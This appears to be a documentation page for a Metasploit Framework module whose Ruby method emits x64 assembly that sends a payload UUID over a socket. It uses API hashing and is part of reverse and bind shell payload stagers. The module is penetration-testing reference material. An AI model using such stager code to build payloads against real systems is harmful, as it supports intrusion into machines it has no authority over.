Module: Msf::Payload::Windows::SendUUID_x64

Included in:
BindNamedPipe_x64, BindTcp_x64, ReverseNamedPipe_x64, ReverseTcp_x64
Defined in:
lib/msf/core/payload/windows/x64/send_uuid_x64.rb

Overview

Basic send_uuid stub for Windows ARCH_X64 payloads


Instance Method Details

#asm_send_uuid(uuid = nil) ⇒ Object

Generate assembly code that writes the UUID to the socket.

This code assumes that the block API pointer is in rbp, and the communications socket handle is in rdi.

# File 'lib/msf/core/payload/windows/x64/send_uuid_x64.rb', line 19

# Builds the x64 assembly text for the stub that writes the payload UUID to
# the communications socket through ws2_32.dll's send.
#
# The emitted stub expects the block API pointer in rbp and the socket handle
# in rdi. The UUID bytes are embedded inline, directly after a call
# instruction, so the address popped into rdx is the buffer pointer. Nothing
# in the stub inspects the value returned by send.
#
# NOTE(review): the length operand comes from the raw UUID at generation time,
# while uuid_required_size budgets a fixed 16 bytes for it. Presumably to_raw
# always yields 16 bytes; confirm.
#
# @param uuid [Object, nil] payload UUID responding to #to_raw; when nil (or
#   false) one is obtained from generate_payload_uuid
# @return [String] assembly source for the send_uuid stub
def asm_send_uuid(uuid = nil)
  uuid = generate_payload_uuid unless uuid
  raw_uuid = uuid.to_raw

  # Interpolated left to right, in the same order as the operands appear in
  # the template: length, then the db bytes, then the API hash.
  %Q^
    send_uuid:
      xor r9, r9              ; flags
      push #{raw_uuid.length} ; length of the UUID
      pop r8
      call get_uuid_address  ; put uuid buffer on the stack
      db #{raw_to_db(raw_uuid)}  ; UUID
    get_uuid_address:
      pop rdx                ; UUID address
      mov rcx, rdi           ; Socket handle
      mov r10, #{Rex::Text.block_api_hash('ws2_32.dll', 'send')}
      call rbp               ; call send
  ^
end

#uuid_required_size ⇒ Object

# File 'lib/msf/core/payload/windows/x64/send_uuid_x64.rb', line 40

# Reports how many bytes the send_uuid stub is budgeted to occupy.
#
# @return [Integer] instruction bytes plus the embedded UUID bytes
def uuid_required_size
  # Number of bytes required for the instructions
  instruction_bytes = 25

  # a UUID is 16 bytes
  uuid_bytes = 16

  instruction_bytes + uuid_bytes
end